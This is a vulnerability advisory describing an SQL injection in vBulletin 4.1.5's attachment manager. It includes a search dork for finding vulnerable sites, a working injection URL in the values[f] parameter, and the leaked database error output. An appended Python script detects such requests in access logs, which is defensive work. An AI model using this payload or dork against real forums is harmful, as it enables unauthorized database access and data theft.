vBulletin 4.1.5 attachment SQLi

2013.03.22
Credit: Anonymous
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

While examining variables I came across an SQL injection, which was later found to be inherent to all vBulletin 4.1.5.

Title: Vulnerability in vBulletin 4.1.5
Dork: Powered by Powered by vBulletin 4.1.5
Conditions: An account on the forum. Permission to attach files to messages / themes (attachments).

Register -> go to the forum -> click a topic or if the board is, you can choose to create an article (the second option more work) -> at the bottom look for Attachments, 'Manage Attachments' -> open the window and, in the setting "values[f]", insert our SQL query.

Example:

Code:
http://site.com/board/newattachment.php?do=assetmanager&values[f]=-1599+or(1,2)=(select*from(select+name_const(version(),1),name_const(version(),1))a)&contenttypeid=18&poststarttime=1360663633&posthash=4f5c850593e10c5450d9e880d58a56d8&insertinline=1

After that, we see the standard "database offline" error; opening the source code of the page, we see:

Code:
<! - Database error in vBulletin 4.1.5 :
Invalid SQL : SELECT permissionsfrom , Hidden , setpublish , publishdate , userid FROM ds23fSDdfsdf_cms_node WHERE nodeid = - 1599 or ( 1 , 2 ) = ( Select * from ( Select name_const ( version () , 1 ), name_const ( version (), 1 )) a );
MySQL Error : Duplicate column Name .1.49-3 '5 '
Error Number : 1060
Request Date : Tuesday , February 12th 2013 @ 01 : 12 : 33 PM
Error Date : Tuesday , February 12th 2013 @ 01 : 12 : 33
Address : 127.0.0.1
Username : Hacker
Classname : vB_Database
MySQL Version : ->
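A detection check for the request described above, added here as an example and not part of the original advisory: it scans web access logs for newattachment.php requests whose values[...] parameter is not a plain integer. The combined log format, the constructed sample lines and the rule that legitimate values are integers are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Request line of a combined-format access log entry (log format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')
# The error output shows values[f] landing in "WHERE nodeid = ...", so a
# legitimate value is assumed to be a plain integer.
INTEGER_RE = re.compile(r"-?\d+")

# Constructed sample lines (documentation IP addresses, shortened query strings).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Feb/2013:13:10:02 +0100] "GET /board/newattachment.php'
    '?do=assetmanager&values[f]=42&contenttypeid=18 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [12/Feb/2013:13:12:33 +0100] "GET /board/newattachment.php'
    '?do=assetmanager&values%5Bf%5D=-1599+or(1,2)=(select*from(select+name_const'
    '(version(),1),name_const(version(),1))a)&contenttypeid=18 HTTP/1.1" 200 1893',
    '192.0.2.10 - - [12/Feb/2013:13:13:40 +0100] "GET /board/showthread.php'
    '?t=7 HTTP/1.1" 200 9000',
]


def suspicious_values(target):
    """Return the non-integer values[...] parameters of a newattachment.php request."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/newattachment.php"):
        return []
    hits = []
    # parse_qsl percent-decodes names and values and turns '+' into a space.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.startswith("values[") and not INTEGER_RE.fullmatch(value.strip()):
            hits.append((name, value))
    return hits


def scan(log_lines):
    """Return (client_ip, parameter, value) for every flagged request."""
    findings = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if match is None:
            continue
        client_ip = line.split(" ", 1)[0]
        for name, value in suspicious_values(match.group("target")):
            findings.append((client_ip, name, value))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Parameters sent in a POST body do not appear in access logs, so the same integer check would have to run on request bodies at a proxy or WAF to cover that path.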

References:

http://pastebin.com/5hgWHFbj

